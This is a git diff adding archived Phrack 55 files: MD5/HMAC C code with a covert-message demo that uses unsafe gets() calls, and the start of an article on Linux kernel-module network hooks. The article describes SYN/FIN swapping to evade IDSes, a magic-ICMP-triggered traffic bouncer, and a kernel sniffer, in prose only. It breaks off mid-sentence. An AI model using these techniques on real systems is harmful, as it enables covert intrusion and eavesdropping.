+ **  To form the message digest for a message M                       **
+ **    (1) Initialize a context buffer mdContext using MD5Init        **
+ **    (2) Call MD5Update on mdContext and M                          **
+ **    (3) Call MD5Final on mdContext                                 **
+ **  The message digest is now in mdContext->digest[0...15]           **
+ ***********************************************************************
+ */
+
+/* forward declaration */
+static void Transform ();
+
+static unsigned char PADDING[64] = {
+  0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
+};
+
+/* F, G, H and I are basic MD5 functions */
+#define F(x, y, z) (((x) & (y)) | ((~x) & (z)))
+#define G(x, y, z) (((x) & (z)) | ((y) & (~z)))
+#define H(x, y, z) ((x) ^ (y) ^ (z))
+#define I(x, y, z) ((y) ^ ((x) | (~z)))
+
+/* ROTATE_LEFT rotates x left n bits */
+#define ROTATE_LEFT(x, n) (((x) << (n)) | ((x) >> (32-(n))))
+
+/* FF, GG, HH, and II transformations for rounds 1, 2, 3, and 4 */
+/* Rotation is separate from addition to prevent recomputation */
+#define FF(a, b, c, d, x, s, ac) \
+  {(a) += F ((b), (c), (d)) + (x) + (UINT4)(ac); \
+   (a) = ROTATE_LEFT ((a), (s)); \
+   (a) += (b); \
+  }
+#define GG(a, b, c, d, x, s, ac) \
+  {(a) += G ((b), (c), (d)) + (x) + (UINT4)(ac); \
+   (a) = ROTATE_LEFT ((a), (s)); \
+   (a) += (b); \
+  }
+#define HH(a, b, c, d, x, s, ac) \
+  {(a) += H ((b), (c), (d)) + (x) + (UINT4)(ac); \
+   (a) = ROTATE_LEFT ((a), (s)); \
+   (a) += (b); \
+  }
+#define II(a, b, c, d, x, s, ac) \
+  {(a) += I ((b), (c), (d)) + (x) + (UINT4)(ac); \
+   (a) = ROTATE_LEFT ((a), (s)); \
+   (a) += (b); \
+  }
+
+/* The routine MD5Init initializes the message-digest context
+   mdContext. All fields are set to zero.
+ */
+void MD5Init (mdContext)
+MD5_CTX *mdContext;
+{
+  mdContext->i[0] = mdContext->i[1] = (UINT4)0;
+
+  /* Load magic initialization constants.
+   */
+  mdContext->buf[0] = (UINT4)0x67452301;
+  mdContext->buf[1] = (UINT4)0xefcdab89;
+  mdContext->buf[2] = (UINT4)0x98badcfe;
+  mdContext->buf[3] = (UINT4)0x10325476;
+}
+
+/* The routine MD5Update updates the message-digest context to
+   account for the presence of each of the characters inBuf[0..inLen-1]
+   in the message whose digest is being computed.
+ */
+void MD5Update (mdContext, inBuf, inLen)
+MD5_CTX *mdContext;
+unsigned char *inBuf;
+unsigned int inLen;
+{
+  UINT4 in[16];
+  int mdi;
+  unsigned int i, ii;
+
+  /* compute number of bytes mod 64 */
+  mdi = (int)((mdContext->i[0] >> 3) & 0x3F);
+
+  /* update number of bits */
+  if ((mdContext->i[0] + ((UINT4)inLen << 3)) < mdContext->i[0])
+    mdContext->i[1]++;
+  mdContext->i[0] += ((UINT4)inLen << 3);
+  mdContext->i[1] += ((UINT4)inLen >> 29);
+
+  while (inLen--) {
+    /* add new character to buffer, increment mdi */
+    mdContext->in[mdi++] = *inBuf++;
+
+    /* transform if necessary */
+    if (mdi == 0x40) {
+      for (i = 0, ii = 0; i < 16; i++, ii += 4)
+        in[i] = (((UINT4)mdContext->in[ii+3]) << 24) |
+                (((UINT4)mdContext->in[ii+2]) << 16) |
+                (((UINT4)mdContext->in[ii+1]) << 8) |
+                ((UINT4)mdContext->in[ii]);
+      Transform (mdContext->buf, in);
+      mdi = 0;
+    }
+  }
+}
+
+/* The routine MD5Final terminates the message-digest computation and
+   ends with the desired message digest in mdContext->digest[0...15].
+ */
+void MD5Final (digest,mdContext)
+unsigned char *digest;
+MD5_CTX *mdContext;
+{
+  UINT4 in[16];
+  int mdi;
+  unsigned int i, ii;
+  unsigned int padLen;
+
+  /* save number of bits */
+  in[14] = mdContext->i[0];
+  in[15] = mdContext->i[1];
+
+  /* compute number of bytes mod 64 */
+  mdi = (int)((mdContext->i[0] >> 3) & 0x3F);
+
+  /* pad out to 56 mod 64 */
+  padLen = (mdi < 56) ? (56 - mdi) : (120 - mdi);
+  MD5Update (mdContext, PADDING, padLen);
+
+  /* append length in bits and transform */
+  for (i = 0, ii = 0; i < 14; i++, ii += 4)
+    in[i] = (((UINT4)mdContext->in[ii+3]) << 24) |
+            (((UINT4)mdContext->in[ii+2]) << 16) |
+            (((UINT4)mdContext->in[ii+1]) << 8) |
+            ((UINT4)mdContext->in[ii]);
+  Transform (mdContext->buf, in);
+
+  /* store buffer in digest */
+  for (i = 0, ii = 0; i < 4; i++, ii += 4) {
+    mdContext->digest[ii] = (unsigned char)(mdContext->buf[i] & 0xFF);
+    mdContext->digest[ii+1] =
+      (unsigned char)((mdContext->buf[i] >> 8) & 0xFF);
+    mdContext->digest[ii+2] =
+      (unsigned char)((mdContext->buf[i] >> 16) & 0xFF);
+    mdContext->digest[ii+3] =
+      (unsigned char)((mdContext->buf[i] >> 24) & 0xFF);
+  }
+  bcopy(mdContext->digest,digest,16);
+}
+
+/* Basic MD5 step. Transforms buf based on in.
+ */
+static void Transform (buf, in)
+UINT4 *buf;
+UINT4 *in;
+{
+  UINT4 a = buf[0], b = buf[1], c = buf[2], d = buf[3];
+
+  /* Round 1 */
+#define S11 7
+#define S12 12
+#define S13 17
+#define S14 22
+  FF ( a, b, c, d, in[ 0], S11, 3614090360); /* 1 */
+  FF ( d, a, b, c, in[ 1], S12, 3905402710); /* 2 */
+  FF ( c, d, a, b, in[ 2], S13,  606105819); /* 3 */
+  FF ( b, c, d, a, in[ 3], S14, 3250441966); /* 4 */
+  FF ( a, b, c, d, in[ 4], S11, 4118548399); /* 5 */
+  FF ( d, a, b, c, in[ 5], S12, 1200080426); /* 6 */
+  FF ( c, d, a, b, in[ 6], S13, 2821735955); /* 7 */
+  FF ( b, c, d, a, in[ 7], S14, 4249261313); /* 8 */
+  FF ( a, b, c, d, in[ 8], S11, 1770035416); /* 9 */
+  FF ( d, a, b, c, in[ 9], S12, 2336552879); /* 10 */
+  FF ( c, d, a, b, in[10], S13, 4294925233); /* 11 */
+  FF ( b, c, d, a, in[11], S14, 2304563134); /* 12 */
+  FF ( a, b, c, d, in[12], S11, 1804603682); /* 13 */
+  FF ( d, a, b, c, in[13], S12, 4254626195); /* 14 */
+  FF ( c, d, a, b, in[14], S13, 2792965006); /* 15 */
+  FF ( b, c, d, a, in[15], S14, 1236535329); /* 16 */
+
+  /* Round 2 */
+#define S21 5
+#define S22 9
+#define S23 14
+#define S24 20
+  GG ( a, b, c, d, in[ 1], S21, 4129170786); /* 17 */
+  GG ( d, a, b, c, in[ 6], S22, 3225465664); /* 18 */
+  GG ( c, d, a, b, in[11], S23,  643717713); /* 19 */
+  GG ( b, c, d, a, in[ 0], S24, 3921069994); /* 20 */
+  GG ( a, b, c, d, in[ 5], S21, 3593408605); /* 21 */
+  GG ( d, a, b, c, in[10], S22,   38016083); /* 22 */
+  GG ( c, d, a, b, in[15], S23, 3634488961); /* 23 */
+  GG ( b, c, d, a, in[ 4], S24, 3889429448); /* 24 */
+  GG ( a, b, c, d, in[ 9], S21,  568446438); /* 25 */
+  GG ( d, a, b, c, in[14], S22, 3275163606); /* 26 */
+  GG ( c, d, a, b, in[ 3], S23, 4107603335); /* 27 */
+  GG ( b, c, d, a, in[ 8], S24, 1163531501); /* 28 */
+  GG ( a, b, c, d, in[13], S21, 2850285829); /* 29 */
+  GG ( d, a, b, c, in[ 2], S22, 4243563512); /* 30 */
+  GG ( c, d, a, b, in[ 7], S23, 1735328473); /* 31 */
+  GG ( b, c, d, a, in[12], S24, 2368359562); /* 32 */
+
+  /* Round 3 */
+#define S31 4
+#define S32 11
+#define S33 16
+#define S34 23
+  HH ( a, b, c, d, in[ 5], S31, 4294588738); /* 33 */
+  HH ( d, a, b, c, in[ 8], S32, 2272392833); /* 34 */
+  HH ( c, d, a, b, in[11], S33, 1839030562); /* 35 */
+  HH ( b, c, d, a, in[14], S34, 4259657740); /* 36 */
+  HH ( a, b, c, d, in[ 1], S31, 2763975236); /* 37 */
+  HH ( d, a, b, c, in[ 4], S32, 1272893353); /* 38 */
+  HH ( c, d, a, b, in[ 7], S33, 4139469664); /* 39 */
+  HH ( b, c, d, a, in[10], S34, 3200236656); /* 40 */
+  HH ( a, b, c, d, in[13], S31,  681279174); /* 41 */
+  HH ( d, a, b, c, in[ 0], S32, 3936430074); /* 42 */
+  HH ( c, d, a, b, in[ 3], S33, 3572445317); /* 43 */
+  HH ( b, c, d, a, in[ 6], S34,   76029189); /* 44 */
+  HH ( a, b, c, d, in[ 9], S31, 3654602809); /* 45 */
+  HH ( d, a, b, c, in[12], S32, 3873151461); /* 46 */
+  HH ( c, d, a, b, in[15], S33,  530742520); /* 47 */
+  HH ( b, c, d, a, in[ 2], S34, 3299628645); /* 48 */
+
+  /* Round 4 */
+#define S41 6
+#define S42 10
+#define S43 15
+#define S44 21
+  II ( a, b, c, d, in[ 0], S41, 4096336452); /* 49 */
+  II ( d, a, b, c, in[ 7], S42, 1126891415); /* 50 */
+  II ( c, d, a, b, in[14], S43, 2878612391); /* 51 */
+  II ( b, c, d, a, in[ 5], S44, 4237533241); /* 52 */
+  II ( a, b, c, d, in[12], S41, 1700485571); /* 53 */
+  II ( d, a, b, c, in[ 3], S42, 2399980690); /* 54 */
+  II ( c, d, a, b, in[10], S43, 4293915773); /* 55 */
+  II ( b, c, d, a, in[ 1], S44, 2240044497); /* 56 */
+  II ( a, b, c, d, in[ 8], S41, 1873313359); /* 57 */
+  II ( d, a, b, c, in[15], S42, 4264355552); /* 58 */
+  II ( c, d, a, b, in[ 6], S43, 2734768916); /* 59 */
+  II ( b, c, d, a, in[13], S44, 1309151649); /* 60 */
+  II ( a, b, c, d, in[ 4], S41, 4149444226); /* 61 */
+  II ( d, a, b, c, in[11], S42, 3174756917); /* 62 */
+  II ( c, d, a, b, in[ 2], S43,  718787259); /* 63 */
+  II ( b, c, d, a, in[ 9], S44, 3951481745); /* 64 */
+
+  buf[0] += a;
+  buf[1] += b;
+  buf[2] += c;
+  buf[3] += d;
+}
+
+/*
+ ***********************************************************************
+ ** End of md5.c                                                      **
+ ******************************** (cut) ********************************
+ */
+<-->
+hmac.c
+------
+<++> P55/Stego-hasho/hmac.c !d4cbaed9
+/* sample code from RFC2104 */
+#include <string.h>
+#include "md5.h"
+
+/*
+** Function: hmac_md5
+*/
+
+void
+hmac_md5(text, text_len, key, key_len, digest)
+unsigned char*  text;                /* pointer to data stream */
+int             text_len;            /* length of data stream */
+unsigned char*  key;                 /* pointer to authentication key */
+int             key_len;             /* length of authentication key */
+unsigned char * digest;              /* caller digest to be filled in */
+
+{
+        MD5_CTX context;
+        unsigned char k_ipad[65];    /* inner padding -
+                                      * key XORd with ipad
+                                      */
+        unsigned char k_opad[65];    /* outer padding -
+                                      * key XORd with opad
+                                      */
+        unsigned char tk[16];
+        int i;
+        /* if key is longer than 64 bytes reset it to key=MD5(key) */
+        if (key_len > 64) {
+
+                MD5_CTX      tctx;
+
+                MD5Init(&tctx);
+                MD5Update(&tctx, key, key_len);
+                MD5Final(tk, &tctx);
+
+                key = tk;
+                key_len = 16;
+        }
+
+        /*
+         * the HMAC_MD5 transform looks like:
+         *
+         * MD5(K XOR opad, MD5(K XOR ipad, text))
+         *
+         * where K is an n byte key
+         * ipad is the byte 0x36 repeated 64 times
+         * opad is the byte 0x5c repeated 64 times
+         * and text is the data being protected
+         */
+
+        /* start out by storing key in pads */
+        bzero( k_ipad, sizeof k_ipad);
+        bzero( k_opad, sizeof k_opad);
+        bcopy( key, k_ipad, key_len);
+        bcopy( key, k_opad, key_len);
+
+        /* XOR key with ipad and opad values */
+        for (i=0; i<64; i++) {
+                k_ipad[i] ^= 0x36;
+                k_opad[i] ^= 0x5c;
+        }
+        /*
+         * perform inner MD5
+         */
+        MD5Init(&context);                   /* init context for 1st
+                                              * pass */
+        MD5Update(&context, k_ipad, 64);     /* start with inner pad */
+        MD5Update(&context, text, text_len); /* then text of datagram */
+        MD5Final(digest, &context);          /* finish up 1st pass */
+        /*
+         * perform outer MD5
+         */
+        MD5Init(&context);                   /* init context for 2nd
+                                              * pass */
+        MD5Update(&context, k_opad, 64);     /* start with outer pad */
+        MD5Update(&context, digest, 16);     /* then results of 1st
+                                              * hash */
+        MD5Final(digest, &context);          /* finish up 2nd pass */
+}
+<-->
+md5driver.c
+-----------
+<++> P55/Stego-hasho/md5driver.c !508d7874
+/*
+ ***********************************************************************
+ ** md5driver.c -- sample test routines                               **
+ ** RSA Data Security, Inc. MD5 Message-Digest Algorithm              **
+ ** Created: 2/16/90 RLR                                              **
+ ** Updated: 1/91 SRD                                                 **
+ ** Updated: 6/99 Conehead                                            **
+ ***********************************************************************
+ */
+
+/*
+ ***********************************************************************
+ ** Copyright (C) 1990, RSA Data Security, Inc. All rights reserved.  **
+ **                                                                   **
+ ** RSA Data Security, Inc. makes no representations concerning       **
+ ** either the merchantability of this software or the suitability    **
+ ** of this software for any particular purpose.  It is provided "as  **
+ ** is" without express or implied warranty of any kind.              **
+ **                                                                   **
+ ** These notices must be retained in any copies of any part of this  **
+ ** documentation and/or software.                                    **
+ ***********************************************************************
+ */
+
+#include <stdio.h>
+#include <sys/types.h>
+#include <time.h>
+#include <string.h>
+#include "md5.h"
+
+/* Prints message digest buffer in mdContext as 32 hexadecimal digits.
+   Order is from low-order byte to high-order byte of digest.
+   Each byte is printed with high-order hexadecimal digit first.
+ */
+static void MDPrint (mdContext)
+MD5_CTX *mdContext;
+{
+  int i;
+
+  for (i = 0; i < 16; i++)
+    printf ("%02x", mdContext->digest[i]);
+}
+
+/* size of test block */
+#define TEST_BLOCK_SIZE 1000
+
+/* number of blocks to process */
+#define TEST_BLOCKS 10000
+
+/* number of test bytes = TEST_BLOCK_SIZE * TEST_BLOCKS */
+static long TEST_BYTES = (long)TEST_BLOCK_SIZE * (long)TEST_BLOCKS;
+
+/* A time trial routine, to measure the speed of MD5.
+   Measures wall time required to digest TEST_BLOCKS * TEST_BLOCK_SIZE
+   characters.
+ */
+static void MDTimeTrial ()
+{
+  MD5_CTX mdContext;
+  time_t endTime, startTime;
+  unsigned char data[TEST_BLOCK_SIZE];
+  unsigned int i;
+  unsigned char digest[16];
+
+  /* initialize test data */
+  for (i = 0; i < TEST_BLOCK_SIZE; i++)
+    data[i] = (unsigned char)(i & 0xFF);
+
+  /* start timer */
+  printf ("MD5 time trial. Processing %ld characters...\n", TEST_BYTES);
+  time (&startTime);
+
+  /* digest data in TEST_BLOCK_SIZE byte blocks */
+  MD5Init (&mdContext);
+  for (i = TEST_BLOCKS; i > 0; i--)
+    MD5Update (&mdContext, data, TEST_BLOCK_SIZE);
+  MD5Final (digest,&mdContext);
+
+  /* stop timer, get time difference */
+  time (&endTime);
+  MDPrint (&mdContext);
+  printf (" is digest of test input.\n");
+  printf
+    ("Seconds to process test input: %ld\n", (long)(endTime-startTime));
+  printf
+    ("Characters processed per second: %ld\n",
+     TEST_BYTES/(endTime-startTime));
+}
+
+/* Computes the message digest for string inString.
+   Prints out message digest, a space, the string (in quotes) and a
+   carriage return.
+ */
+static void MDString (inString)
+char *inString;
+{
+  MD5_CTX mdContext;
+  unsigned int len = strlen (inString);
+  unsigned char digest[16];
+
+  MD5Init (&mdContext);
+  MD5Update (&mdContext, inString, len);
+  MD5Final (digest,&mdContext);
+/*  MDPrint (&mdContext);
+  printf (" \"%s\"\n", inString);*/
+}
+
+/* Computes the message digest for a specified file.
+   Prints out message digest, a space, the file name, and a carriage
+   return.
+ */
+static void MDFile (filename)
+char *filename;
+{
+  FILE *inFile = fopen (filename, "rb");
+  MD5_CTX mdContext;
+  int bytes;
+  unsigned char data[1024];
+  unsigned char digest[16];
+
+  if (inFile == NULL) {
+    printf ("%s can't be opened.\n", filename);
+    return;
+  }
+
+  MD5Init (&mdContext);
+  while ((bytes = fread (data, 1, 1024, inFile)) != 0)
+    MD5Update (&mdContext, data, bytes);
+  MD5Final (digest,&mdContext);
+  MDPrint (&mdContext);
+  printf (" %s\n", filename);
+  fclose (inFile);
+}
+
+/* Writes the message digest of the data from stdin onto stdout,
+   followed by a carriage return.
+ */
+static void MDFilter ()
+{
+  MD5_CTX mdContext;
+  int bytes;
+  unsigned char data[16];
+  unsigned char digest[16];
+
+  MD5Init (&mdContext);
+  while ((bytes = fread (data, 1, 16, stdin)) != 0)
+    MD5Update (&mdContext, data, bytes);
+  MD5Final (digest,&mdContext);
+  MDPrint (&mdContext);
+  printf ("\n");
+}
+
+/* Runs a standard suite of test data.
+ */
+static void MDTestSuite ()
+{
+  printf ("MD5 test suite results:\n");
+  MDString ("");
+  MDString ("a");
+  MDString ("abc");
+  MDString ("message digest");
+  MDString ("abcdefghijklmnopqrstuvwxyz");
+  MDString
+    ("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789");
+  MDString
+    ("1234567890123456789012345678901234567890\
+1234567890123456789012345678901234567890");
+  /* Contents of file foo are "abc" */
+  MDFile ("foo");
+}
+
+static void MDTestDictionary ()
+{
+  char word[100];
+  unsigned char digest[16];
+
+  FILE *inFile = fopen ("/usr/dict/words", "r");
+  printf ("MD5 dictionary results:\n");
+  while (fscanf(inFile,"%s",word) != EOF)
+    hmac_md5(word, strlen(word), "testkey", strlen("testkey"), digest);
+  fclose(inFile);
+}
+
+static void MDTestStegoHasho ()
+{
+  char key[100];
+  char word[100];
+  char message[100];
+  char public[50];
+  time_t timestamp;
+  char secret[50];
+  unsigned char digest1[16],digest2[16];
+  int i;
+
+  FILE *inFile = fopen ("/usr/dict/words", "r");
+  printf ("MD5 Stego Hasho\n");
+  printf ("Sender-\n");
+  printf ("Input shared secret key:");
+  gets(key);
+  printf ("Input public message:");
+  gets(public);
+  time (&timestamp);
+  printf ("Input secret message:");
+  gets(secret);
+  printf ("Creating hash\n");
+  sprintf(message,"%s%d",public,timestamp);
+  strcat(message,secret);
+  hmac_md5(message, strlen(message), key, strlen(key), digest1);
+  printf ("Sent across wire from sender to receiver-\nmessage:%s%d hash:",
+          public,timestamp);
+  for (i = 0; i < 16; i++)
+    printf ("%02x", digest1[i]);
+  printf ("\nReceiver-\n");
+  printf ("See if only MAC\n");
+  sprintf(message,"%s%d",public,timestamp);
+  hmac_md5(message, strlen(message), key, strlen(key), digest2);
+  printf ("MAC hash:");
+  for (i = 0; i < 16; i++)
+    printf ("%02x", digest2[i]);
+  if (bcmp(digest1,digest2,16) != 0)
+    printf ("\nNot a MAC!\n");
+  else {
+    printf ("\nIt's a MAC!\n");
+    fclose(inFile);
+    exit(0);
+  }    
+  printf ("Finding secret message\n");
+  while (fscanf(inFile,"%s",word) != EOF) {
+    sprintf(message,"%s%d",public,timestamp);
+    strcat(message,word);
+    hmac_md5(message, strlen(message), key, strlen(key), digest2);
+    if (bcmp(digest1,digest2,16) == 0) {
+      printf ("Dictionary word hash:");
+      for (i = 0; i < 16; i++)
+        printf ("%02x", digest2[i]);
+      printf ("\nThe secret message is %s!\n",word);
+      break;
+    }
+  }
+  if (bcmp(digest1,digest2,16) != 0)
+    printf ("The secret message was not found!\n");
+  fclose(inFile);
+}
+
+int main (argc, argv)
+int argc;
+char *argv[];
+{
+  int i;
+
+  /* For each command line argument in turn:
+  ** filename          -- prints message digest and name of file
+  ** -d                -- prints time trial of whole dictionary
+  ** -h                -- performs stego hasho
+  ** -sstring          -- prints message digest and contents of string
+  ** -t                -- prints time trial statistics for 10M
+                          characters
+  ** -x                -- execute a standard suite of test data
+  ** (no args)         -- writes messages digest of stdin onto stdout
+  */
+  if (argc == 1)
+    MDFilter ();
+  else
+    for (i = 1; i < argc; i++)
+      if (argv[i][0] == '-' && argv[i][1] == 's')
+        MDString (argv[i] + 2);
+      else if (strcmp (argv[i], "-d") == 0)
+        MDTestDictionary ();
+      else if (strcmp (argv[i], "-h") == 0)
+        MDTestStegoHasho ();
+      else if (strcmp (argv[i], "-t") == 0)
+        MDTimeTrial ();
+      else if (strcmp (argv[i], "-x") == 0)
+        MDTestSuite ();
+      else MDFile (argv[i]);
+
+  return(0);
+}
+
+/*
+ ***********************************************************************
+ ** End of md5driver.c                                                **
+ ******************************** (cut) ********************************
+ */
+<-->
+----[  EOF
diff --git a/phrack55/12.txt b/phrack55/12.txt
new file mode 100644
index 0000000..c8b6aec
--- /dev/null
+++ b/phrack55/12.txt
@@ -0,0 +1,1542 @@
+-------[  Phrack Magazine --- Vol. 9 | Issue 55 --- 09.09.99 --- 12 of 19  ]
+
+
+-------------------------[  Building Into The Linux Network Layer  ]
+
+
+--------[  kossak <kossak@hackers-pt.org>, lifeline <arai@hackers-pt.org>  ]
+
+
+----[  Introduction
+
+As we all know, the Linux kernel has a monolithic architecture.  That basically
+means that every piece of code that is executed by the kernel has to be loaded
+into kernel memory.  To prevent having to rebuild the kernel every time new
+hardware is added (to add drivers for it), Mr. Linus Torvalds and the gang 
+came up with the loadable module concept that we all came to love: the linux 
+kernel modules (lkm's for short).  This article begins by pointing out yet more
+interesting things that can be done using lkm's in the networking layer, and
+finishes by trying to provide a solution to kernel backdooring.
+
+
+----[  Socket Kernel Buffers
+
+TCP/IP is a layered set of protocols.  This means that the kernel needs to use
+several routine functions to process the different packet layers in order to
+fully "understand" the packet and connect it to a socket, etc.  First, it
+needs a routine to handle the link-layer header and, once processed there, the
+packet is passed to the IP-layer handling routine(s), then to the transport-
+layer routine(s) and so on.  Well, the different protocols need a way
+to communicate with each other as the packets are being processed.  Under Linux
+the answer to this are socket kernel buffers (or sk_buff's).  These are used to
+pass data between the different protocol layers (handling routines) and
+the network device drivers.
+
+The sk_buff{} structure (only the most important items are presented, see
+linux/include/linux/skbuff.h for more):
+
+sk_buff{}
+--------+
+next    |
+--------|
+prev    |
+--------|
+dev     |
+--------|
+        |
+--------|
+head    |---+
+--------|   |
+data    |---|---+
+--------|   |   |
+tail    |---|---|---+
+--------|   |   |   |
+end     |---|---|---|---+
+--------|<--+   |   |   |
+        |       |   |   |
+--------|<------+   |   |
+Packet  |           |   |
+being   |           |   |
+handled |           |   |
+--------|<----------+   |
+        |               |
+        |               |
+        |               |
+--------+<--------------+
+
+next:   pointer to the next sk_buff{}.
+prev:   pointer to the previous sk_buff{}.
+dev:    device we are currently using.
+head:   pointer to beginning of buffer which holds our packet.
+data:   pointer to the actual start of the protocol data.  This may vary
+        depending of the protocol layer we are on.
+tail:   pointer to the end of protocol data, also varies depending of the
+        protocol layer using he sk_buff.
+end:    points to the end of the buffer holding our packet. Fixed value.
+
+
+For further enlightenment, imagine this:
+
+- host A sends a packet to host B
+
+- host B receives the packet through the appropriate network device.
+
+- the network device converts the received data into sk_buff data structures.
+
+- those data structures are added to the backlog queue.
+
+- the scheduler then determines which protocol layer to pass the received
+  packets to.
+
+Thus, our next question arises...  How does the scheduler determine which
+protocol to pass the data to?  Well, each protocol is registered in a
+packet_type{} data structure which is held by either the ptype_all list or
+the ptype_base hash table.  The packet_type{} data structure holds information
+on protocol type, network device, pointer to the protocol's receive data
+processing routine and a pointer to the next packet_type{} structure.  The
+network handler matches the protocol types of the incoming packets (sk_buff's)
+with the ones in one or more packet_type{} structures.  The sk_buff is then
+passed to the matching protocol's handling routine(s).
+
+
+----[  The Hack
+
+What we do is code our own kernel module that registers our packet_type{} 
+data structure to handle all incoming packets (sk_buff's) right after they
+come out of the device driver.  This is easier than it seems.  We simply fill
+in a packet_type{} structure and register it by using a kernel exported
+function called dev_add_pack().  Our handler will then sit between the device 
+driver and the next (previously the first) routine handler.  This means that
+every sk_buff that arrives from the device driver has to pass first through our
+packet handler.
+
+
+----[  The Examples
+
+We present you with three real-world examples, a protocol "mutation" layer,
+a kernel-level packet bouncer, and a kernel-level packet sniffer.
+
+
+----[  OTP (Obscure Transport Protocol)
+
+The first one is really simple (and fun too), it works in a client-server
+paradigm, meaning that you need to have two modules loaded, one on the client
+and one on the server (duh).  The client module catches every TCP packet with
+the SYN flag on and swaps it with a FIN flag.  The server module does exactly
+the opposite, swaps the FIN for a SYN.  I find this particularly fun since both
+sides behave like a regular connection is undergoing, but if you watch it on
+the wire it will seem totally absurd.  This can also do the same for ports and
+source address. Let's look at an example taken right from the wire.
+
+Imagine the following scenario, we have host 'doubt' who wishes to make a
+telnet connection to host 'hardbitten'.  We load the module in both sides
+telling it to swap port 23 for 80 and to swap a SYN for a FIN and vice-versa.
+
+[lifeline@doubt ITP]$ telnet hardbitten
+A regular connection (without the modules loaded) looks like this:
+
+03:29:56.766445 doubt.1025 > hardbitten.23: tcp (SYN)
+03:29:56.766580 hardbitten.23 > doubt.1025: tcp (SYN ACK)
+03:29:56.766637 doubt.1025 > hardbitten.23: tcp (ACK)
+
+(we only look at the initial connection request, the 3-way handshake)
+
+Now we load the modules and repeat the procedure.  If we look at the wire the
+connection looks like the following:
+
+03:35:30.576331 doubt.1025 > hardbitten.80: tcp (FIN)
+03:35:30.576440 hardbitten.80 > doubt.1025: tcp (FIN ACK)
+03:35:30.576587 doubt.1025 > hardbitten.80: tcp (ACK)
+
+When, what is happening in fact, is that 'doubt' is (successfully) requesting a
+telnet session to host 'hardbitten'.  This is a nice way to evade IDSes and
+many firewall policies.  It is also very funny. :-)
+
+Ah, There is a problem with this, when closing a TCP connection the FIN's are
+replaced by SYN's because of the reasons stated above, there is, however, an
+easy way to get around this, is to tell our lkm just to swap the flags when the
+socket is in TCP_LISTEN, TCP_SYN_SENT or TCP_SYN_RECV states.  I have not
+implemented this partly to avoid misuse by "script kiddies", partly because of
+laziness and partly because I'm just too busy.  However, it is not hard to do
+this, go ahead and try it, I trust you.
+
+
+----[  A Kernel Traffic Bouncer
+
+This packet relaying tool is mainly a proof of concept work at this point.
+This one is particularly interesting when combined with the previous example.
+We load our module on the host 'medusa' that then sits watching every packet
+coming in.  We want to target host 'hydra' but this one only accepts telnet
+connections from the former.  However, it's too risky to log into 'medusa'
+right now, because root is logged.  No problem, we send an ICMP_ECHO_REQUEST
+packet that contains a magic cookie or password and 2 ip's and 2 ports like:
+<sourceip:srcport, destip:destport>.  We can however omit srcport without too
+much trouble (as we did on the example shown below).  Our module then accepts
+this cookie and processes it.  It now knows that any packet coming from
+sourceip:srcport into medusa:destport is to be sent to destip:destport.
+
+The following example illustrates this nicely:
+
+- host medusa has bouncer module installed.
+
+- host medusa receives an magic ICMP packet with:
+  <sourceip:srcprt, destip:dstprt>
+
+- any packet coming to host medusa from `sourceip:srcprt` with destination
+  port `dstport` is routed to `destip`, and vice-versa.  The packets are
+  never processed by the rest of the stack on medusa.
+
+Note that as I said above, in the coded example we removed `srcprt` from the
+information sent to the bouncer.  This means it will accept packets from any
+source port.  This can be dangerous: imagine that I have this bouncing rule
+processed on host 'medusa':
+
+<intruder, hydra:23>
+
+Now try to telnet from 'medusa' to 'hydra'.  You won't make it.  Every packet
+coming back from hydra is sent to 'intruder', so no response appears to the
+user executing the telnet.  Intruder will drop the packets obviously, since he
+didn't start a connection.  Using a source port on the rule minimizes this
+risk, but there is still a possibility (not likely) that a user on medusa uses
+the same source port we used on our bouncing rule.  This should be possible to
+avoid by reserving the source port on host medusa (see masquerading code in
+the kernel).
+
+As a side note, this technique can be used on almost all protocols, even those
+without port abstraction (UDP/TCP). Even icmp bouncing should be possible
+using cookies.  This is a more low-level approach than ip masquerading, and
+IMHO a much better one :)
+
+Issues with the bouncer:
+- Source port ambiguity.   My suggestion to solving this is to accept the
+rules without a source port, and then add that to the rule after a SYN packet
+reaches the bouncer.  The rule then only affects that connection.  The
+source port is then cleared by an RST or a timeout waiting for packets.
+- No timeout setting on rules.
+- The bouncer does not handle IP fragments.
+
+Also, there's a bigger issue in hand.  Notice in the source that I'm sending 
+the packets right through the device they came.  This is a bad situation for 
+routers.  This happens because I only have immediate access to the hardware 
+address of the originating packet's device.  To implement routing to another 
+device, we must consult IP routing tables, find the device that is going to 
+send the packet, and the destination machine's MAC address (if it is an
+ethernet device), that may only be available after an ARP request.  It's tricky
+stuff.  This problem, depending on the network, can become troublesome. 
+Packets could be stuck on 2 hosts looping until they expire (via TTL), or, if
+the network has traffic redundancy, they might escape safely.
+
+
+----[  A Kernel Based Sniffer
+
+Another proof of concept tool, the sniffer is a bit simpler in concept than
+the bouncer.  It just sits in its socket buffer handler above all other
+protocol handlers and listens for, say, TCP packets, and then logs them to a
+file.  There are some tricks to it of course...  We have to be able to
+identify packets from different connections, and better yet, we have to
+order out-of-sequence tcp packets, in order to get coherent results.  This
+is particularly nasty in case of telnet connections.
+
+ (a timeout feature is
+missing too, and the capability
+of sniffing more than one connection at a given moment (this one is tricky).
+
+Ideally, the module should store all results in kernel memory and send them
+back to us (if we say, send it a special packet).  But this is a proof of
+concept, and it is not a finished "script kiddies" product, so I leave you
+smart readers to polish the code, learn it, and experiment with it :)
+
+
+----[  A Solution For Kernel Harassing
+
+So, having fun kicking kernel ass from left to right?  Let's end the tragedy,
+the linux kernel is your friend! :)  Well, I've read Silvio's excellent article
+about patching the kernel using /dev/kmem, so obviously compiling the kernel
+without module support is not enough.  I leave you with an idea.  It should be
+fairly simple to code.  It's a module (yes, another one), that when loaded
+prevents any other modules to load, and turns /dev/kmem into a read-only
